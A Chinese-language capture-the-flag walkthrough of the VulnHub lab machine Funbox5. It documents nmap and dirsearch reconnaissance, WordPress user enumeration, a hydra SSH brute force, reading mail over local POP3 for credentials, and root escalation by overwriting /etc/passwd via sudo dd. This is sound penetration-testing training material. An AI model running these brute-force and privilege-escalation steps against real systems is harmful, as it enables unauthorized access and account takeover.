靶机渗透练习26-Funbox5-Next Level
靶机描述
靶机地址:https://www.vulnhub.com/entry/funbox-next-level,547/
Description
Lets separate the script-kids from script-teenies.
Hint: The first impression is not always the right one!
If you need hints, call me on twitter: @0815R2d2 Have fun...
This works better with VirtualBox rather than VMware
This works better with VirtualBox rather than VMware.
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.9.7
靶机:
IP地址:192.168.9.44
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
arp-scan -I eth0 -l
☁ kali arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2 08:00:27:2a:3b:5b PCS Systemtechnik GmbH
192.168.9.44 08:00:27:fe:0e:32 PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.938 seconds (132.09 hosts/sec). 2 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四、等你们补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
☁ kali nmap -A -sV -T4 -p- 192.168.9.44
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-15 16:37 CST
Nmap scan report for bogon (192.168.9.44)
Host is up (0.00035s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 af:ae:39:e2:da:bb:6f:1a:6b:04:ec:36:29:d9:0c:ea (RSA)
| 256 1d:d7:ef:2c:85:bf:0d:fc:e2:60:85:22:42:8d:cc:4d (ECDSA)
|_ 256 a0:a4:6d:d9:ca:3e:71:a1:31:ea:a2:7e:42:63:13:74 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:FE:0E:32 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.35 ms bogon (192.168.9.44)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.01 seconds
22---ssh---OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80---http----Apache httpd 2.4.18 ((Ubuntu))
2.2枚举漏洞
2.2.1 22 端口分析
一般只能暴力破解,暂时没有合适的字典
2.2.2 80 端口分析
访问 80 端口
查看源码,没有什么发现
扫描一下目录:dirsearch -u http://192.168.9.44
☁ kali dirsearch -u http://192.168.9.44
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.9.44/_22-03-15_16-44-39.txt
Error Log: /root/.dirsearch/logs/errors-22-03-15_16-44-39.log
Target: http://192.168.9.44/
[16:44:39] Starting:
[16:44:39] 403 - 277B - /.ht_wsr.txt
[16:44:39] 403 - 277B - /.htaccess.bak1
[16:44:39] 403 - 277B - /.htaccess.orig
[16:44:39] 403 - 277B - /.htaccess_extra
[16:44:39] 403 - 277B - /.htaccess_orig
[16:44:39] 403 - 277B - /.htaccess.sample
[16:44:39] 403 - 277B - /.htaccess.save
[16:44:39] 403 - 277B - /.htaccessBAK
[16:44:39] 403 - 277B - /.htaccess_sc
[16:44:39] 403 - 277B - /.htaccessOLD
[16:44:39] 403 - 277B - /.htaccessOLD2
[16:44:39] 403 - 277B - /.htm
[16:44:39] 403 - 277B - /.html
[16:44:39] 403 - 277B - /.htpasswd_test
[16:44:39] 403 - 277B - /.httr-oauth
[16:44:39] 403 - 277B - /.htpasswds
[16:44:40] 403 - 277B - /.php
[16:44:40] 403 - 277B - /.php3
[16:44:50] 301 - 313B - /drupal -> http://192.168.9.44/drupal/
[16:44:52] 200 - 11KB - /index.html
[16:44:58] 200 - 16B - /robots.txt
[16:44:59] 403 - 277B - /server-status
[16:44:59] 403 - 277B - /server-status/
Task Completed
发现目录drupal,这应该是drupal cms
访问:http://192.168.9.44/robots.txt
发现Allow: Thinking
访问:http://192.168.9.44/drupal/
发现会会被重定向到:https://192.168.178.33/drupal/
再扫描一下dirsearch -u http://192.168.9.44/drupal
☁ kali dirsearch -u http://192.168.9.44/drupal
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.9.44/-drupal_22-03-15_16-54-04.txt
Error Log: /root/.dirsearch/logs/errors-22-03-15_16-54-04.log
Target: http://192.168.9.44/drupal/
[16:54:04] Starting:
[16:54:05] 403 - 277B - /drupal/.ht_wsr.txt
[16:54:05] 403 - 277B - /drupal/.htaccess.sample
[16:54:05] 403 - 277B - /drupal/.htaccess.orig
[16:54:05] 403 - 277B - /drupal/.htaccess.save
[16:54:05] 403 - 277B - /drupal/.htaccess_orig
[16:54:05] 403 - 277B - /drupal/.htaccess.bak1
[16:54:05] 403 - 277B - /drupal/.htaccess_sc
[16:54:05] 403 - 277B - /drupal/.htaccessOLD
[16:54:05] 403 - 277B - /drupal/.htaccessBAK
[16:54:05] 403 - 277B - /drupal/.htaccess_extra
[16:54:05] 403 - 277B - /drupal/.htaccessOLD2
[16:54:05] 403 - 277B - /drupal/.htm
[16:54:05] 403 - 277B - /drupal/.html
[16:54:05] 403 - 277B - /drupal/.htpasswds
[16:54:05] 403 - 277B - /drupal/.htpasswd_test
[16:54:05] 403 - 277B - /drupal/.httr-oauth
[16:54:05] 403 - 277B - /drupal/.php
[16:54:05] 403 - 277B - /drupal/.php3
[16:54:19] 200 - 61KB - /drupal/index.php
[16:54:20] 200 - 19KB - /drupal/license.txt
[16:54:24] 200 - 7KB - /drupal/readme.html
[16:54:29] 301 - 322B - /drupal/wp-admin -> http://192.168.9.44/drupal/wp-admin/
[16:54:29] 301 - 324B - /drupal/wp-content -> http://192.168.9.44/drupal/wp-content/
[16:54:29] 200 - 0B - /drupal/wp-content/
[16:54:29] 200 - 0B - /drupal/wp-config.php
[16:54:29] 200 - 69B - /drupal/wp-content/plugins/akismet/akismet.php
[16:54:29] 400 - 1B - /drupal/wp-admin/admin-ajax.php
[16:54:29] 500 - 0B - /drupal/wp-content/plugins/hello.php
[16:54:30] 200 - 797B - /drupal/wp-content/upgrade/
[16:54:30] 200 - 987B - /drupal/wp-content/uploads/
[16:54:30] 500 - 0B - /drupal/wp-includes/rss-functions.php
[16:54:30] 301 - 325B - /drupal/wp-includes -> http://192.168.9.44/drupal/wp-includes/
[16:54:30] 200 - 0B - /drupal/wp-cron.php
[16:54:30] 200 - 6KB - /drupal/wp-login.php
[16:54:30] 302 - 0B - /drupal/wp-signup.php -> http://192.168.178.33/drupal/wp-login.php?action=register
[16:54:30] 200 - 47KB - /drupal/wp-includes/
[16:54:30] 200 - 1KB - /drupal/wp-admin/install.php
[16:54:30] 409 - 3KB - /drupal/wp-admin/setup-config.php
[16:54:30] 302 - 0B - /drupal/wp-admin/ -> http://192.168.178.33/drupal/wp-login.php?redirect_to=http%3A%2F%2F192.168.9.44%2Fdrupal%2Fwp-admin%2F&reauth=1
[16:54:30] 405 - 42B - /drupal/xmlrpc.php
Task Completed
☁ kali
2.3漏洞利用
2.3.1 WordPress站常规方法getshell
由于扫描结果中存在 WordPress,利用 wpscan 进行扫描,发现两个用户
wpscan --url http://192.168.9.44/drupal/index.php --wp-content-dir=http://192.168.9.44/drupal/wp-content --enumerate u,p
由于无法访问 wp-admin,但是开放了 22 端口,尝试利用得到的两个用户名来爆破 ssh 登录密码
hydra -l ben -P /usr/share/wordlists/rockyou.txt -V 192.168.9.44 ssh
得到一组用户名和密码 ben:pookie,利用该凭据连接 ssh
☁ FunBox5 ssh ben@192.168.9.44
The authenticity of host '192.168.9.44 (192.168.9.44)' can't be established.
ED25519 key fingerprint is SHA256:4lkUEnVJ8e8tWErWTlMuTZGW7/L9OPWmcqJlMVLFFGE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.9.44' (ED25519) to the list of known hosts.
ben@192.168.9.44's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-189-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
You have mail.
Last login: Tue Sep 1 22:14:28 2020 from 192.168.178.143
ben@funbox5:~$ id
uid=1001(ben) gid=1001(ben) groups=1001(ben),8(mail)
ben@funbox5:~$
2.4权限提升
2.4.1 信息收集
注意到 ben 用户在 mail 组中,但是不能直接使用
ben@funbox5:~$ mail
-bash: /usr/bin/mail: Permission denied
ben@funbox5:~$ netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN -
tcp 0 0 192.168.9.44:22 192.168.9.7:51808 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::110 :::* LISTEN -
tcp6 0 0 :::143 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
尝试连接到本地的 110 端口,用 ben 用户的信息凭据登录,发现三封邮件,在第三封邮件中发现了一组用户名和密码:adam:qwedsayxc!
ben@funbox5:~$ telnet 127.0.0.1 110
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
+OK Dovecot ready.
user ben
+OK
pass pookie
+OK Logged in.
list
+OK 3 messages:
1 403
2 391
3 578
.
retr 1
+OK 403 octets
Return-Path: <maria@funbox5.fritz.box>
Received: from funbox4 (localhost [127.0.0.1])
by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VCk80g014898
for ben@localhost; Mon, 31 Aug 2020 14:47:42 +0200
Date: Mon, 31 Aug 2020 14:46:08 +0200
From: maria@funbox5.fritz.box
Message-Id: <202008311247.07VCk80g014898@funbox5.fritz.box>
Hi Ben,
are you going to Jonas' party on Saturday?
.
retr 2
+OK 391 octets
Return-Path: <maria@funbox5.fritz.box>
Received: from funbox4 (localhost [127.0.0.1])
by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VCk80h014898
for ben@localhost; Mon, 31 Aug 2020 14:54:40 +0200
Date: Mon, 31 Aug 2020 14:54:40 +0200
From: maria@funbox5.fritz.box
Message-Id: <202008311254.07VCk80h014898@funbox5.fritz.box>
Hey Ben,
did you do all the updates?
.
retr 3
+OK 578 octets
Return-Path: <maria@funbox5.fritz.box>
Received: from funbox4 (localhost [127.0.0.1])
by funbox5.fritz.box (8.15.2/8.15.2/Debian-3) with SMTP id 07VD43wQ015008
for ben@localhost; Mon, 31 Aug 2020 15:04:40 +0200
Date: Mon, 31 Aug 2020 15:04:03 +0200
From: maria@funbox5.fritz.box
Message-Id: <202008311304.07VD43wQ015008@funbox5.fritz.box>
Hi Ben,
please come to my office at 10:00 a.m. We have a lot to talk about!
The new employees must be created. I've already finished Adam.
adam: qwedsayxc!
切换用户到
adam,查看id发现该用户在sudo组中,查看sudo -l
ben@funbox5:~$ su adam
Password:
adam@funbox5:/home/ben$ id
uid=1002(adam) gid=1002(adam) groups=1002(adam),27(sudo),1003(docker)
adam@funbox5:/home/ben$ sudo -l
[sudo] password for adam:
Matching Defaults entries for adam on funbox5:
env_reset
User adam may run the following commands on funbox5:
(root) PASSWD: /bin/dd
(root) PASSWD: /bin/de
(root) PASSWD: /bin/df
adam@funbox5:/home/ben$
在https://gtfobins.github.io/查询dd、de、df
查询到dd可利用
2.4.2 sudo提权
先使用 dd 命令将
/etc/passwd复制到当前目录下
adam@funbox5:~$ ls -al
total 32
drwx------ 3 adam adam 4096 Sep 1 2020 .
drwxr-xr-x 5 root root 4096 Aug 31 2020 ..
-rw------- 1 adam adam 11 Sep 1 2020 .bash_history
-rw-r--r-- 1 adam adam 220 Aug 31 2020 .bash_logout
-rw-r--r-- 1 adam adam 3771 Aug 31 2020 .bashrc
drwx------ 2 adam adam 4096 Aug 31 2020 .cache
-rw-r--r-- 1 adam adam 655 Aug 31 2020 .profile
-rw-r--r-- 1 adam adam 0 Aug 31 2020 .sudo_as_admin_successful
-rw------- 1 adam adam 852 Sep 1 2020 .viminfo
adam@funbox5:~$ sudo /bin/dd if=/etc/passwd of=./passwd
3+1 records in
3+1 records out
2020 bytes (2.0 kB, 2.0 KiB) copied, 0.000224192 s, 9.0 MB/s
adam@funbox5:~$ ls -al
total 36
drwx------ 3 adam adam 4096 Mar 15 10:27 .
drwxr-xr-x 5 root root 4096 Aug 31 2020 ..
-rw------- 1 adam adam 11 Sep 1 2020 .bash_history
-rw-r--r-- 1 adam adam 220 Aug 31 2020 .bash_logout
-rw-r--r-- 1 adam adam 3771 Aug 31 2020 .bashrc
drwx------ 2 adam adam 4096 Aug 31 2020 .cache
-rw-r--r-- 1 root root 2020 Mar 15 10:27 passwd
-rw-r--r-- 1 adam adam 655 Aug 31 2020 .profile
-rw-r--r-- 1 adam adam 0 Aug 31 2020 .sudo_as_admin_successful
-rw------- 1 adam adam 852 Sep 1 2020 .viminfo
由于
adam用户没有修改权限,所以将其下载到本地
☁ FunBox5 scp adam@192.168.9.44:/home/adam/passwd ./
adam@192.168.9.44's password:
passwd 100% 2020 3.1MB/s 00:00
☁ FunBox5 cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
postfix:x:111:117::/var/spool/postfix:/bin/false
dovecot:x:112:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:113:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
maria:x:1000:1000:,,,:/home/maria:/bin/bash
ben:x:1001:1001:,,,:/home/ben:/bin/bash
smmta:x:115:123:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:124:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
adam:x:1002:1002:,,,:/home/adam:/bin/bash
生成一个以 root 为密码的密文,然后使用 root 身份进行修改
☁ FunBox5 mkpasswd -m sha-512 root
$6$QoX42cly5BuSvuON$tCVjJr7rZ.AW2MEsOkET.LDdgP/EkRoJXpsApB9Q2.pBXS7zy5FYW6COuYW0Xih5y5y060U83ZiKK1InV1eEY0
☁ FunBox5 gedit passwd
** (gedit:287197): WARNING **: 17:34:04.833: Set document metadata failed: 不支持设置属性 metadata::gedit-spell-language
** (gedit:287197): WARNING **: 17:34:04.833: Set document metadata failed: 不支持设置属性 metadata::gedit-encoding
** (gedit:287197): WARNING **: 17:34:07.570: Set document metadata failed: 不支持设置属性 metadata::gedit-spell-language
** (gedit:287197): WARNING **: 17:34:07.571: Set document metadata failed: 不支持设置属性 metadata::gedit-encoding
** (gedit:287197): WARNING **: 17:34:09.408: Set document metadata failed: 不支持设置属性 metadata::gedit-position
☁ FunBox5 cat passwd
root:$6$QoX42cly5BuSvuON$tCVjJr7rZ.AW2MEsOkET.LDdgP/EkRoJXpsApB9Q2.pBXS7zy5FYW6COuYW0Xih5y5y060U83ZiKK1InV1eEY0:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
postfix:x:111:117::/var/spool/postfix:/bin/false
dovecot:x:112:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:113:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
maria:x:1000:1000:,,,:/home/maria:/bin/bash
ben:x:1001:1001:,,,:/home/ben:/bin/bash
smmta:x:115:123:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:124:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
adam:x:1002:1002:,,,:/home/adam:/bin/bash
☁ FunBox5
将修改好的内容上传回去
☁ FunBox5 scp passwd adam@192.168.9.44:/tmp
adam@192.168.9.44's password:
passwd 100% 2125 4.8MB/s 00:00
☁ FunBox5
再利用 dd 命令将
/etc/passwd的内容替换成修改过后的内容
adam@funbox5:~$ sudo /bin/dd if=/tmp/passwd of=/etc/passwd
4+1 records in
4+1 records out
2125 bytes (2.1 kB, 2.1 KiB) copied, 0.000315389 s, 6.7 MB/s
切换到 root 用户,用 root 作为密码登录,成功拿到 root 权限
adam@funbox5:~$ su root
Password:
root@funbox5:/home/adam# cd /root
root@funbox5:~# ls
flag.txt
root@funbox5:~# cat flag.txt
_______ _ ______ _ _
(_______) | | | ___ \ _ | | | |
_____ _ _ ____ | | _ ___ _ _ _ | | | | ____ _ _| |_ | | ____ _ _ ____| |
| ___) | | | _ \| || \ / _ ( \ / |_) | | | |/ _ | \ / ) _) | | / _ ) | | / _ ) |
| | | |_| | | | | |_) ) |_| ) X ( _ | | | ( (/ / ) X (| |__ | |____( (/ / \ V ( (/ /| |
|_| \____|_| |_|____/ \___(_/ \_|_) |_| |_|\____|_/ \_)\___) |_______)____) \_/ \____)_|
Made with ❤ by @0815R2d2
Please, tweet me a screenshot on Twitter.
THX 4 playing this Funbox.
root@funbox5:~#
总结
本靶机主要通过wpscan及hydra工具getshell,最后sudo提权
- wpscan工具的使用
- hydra爆破ssh登录账户密码
- 本地连接110端口进行信息收集
- sudo提权---dd提权
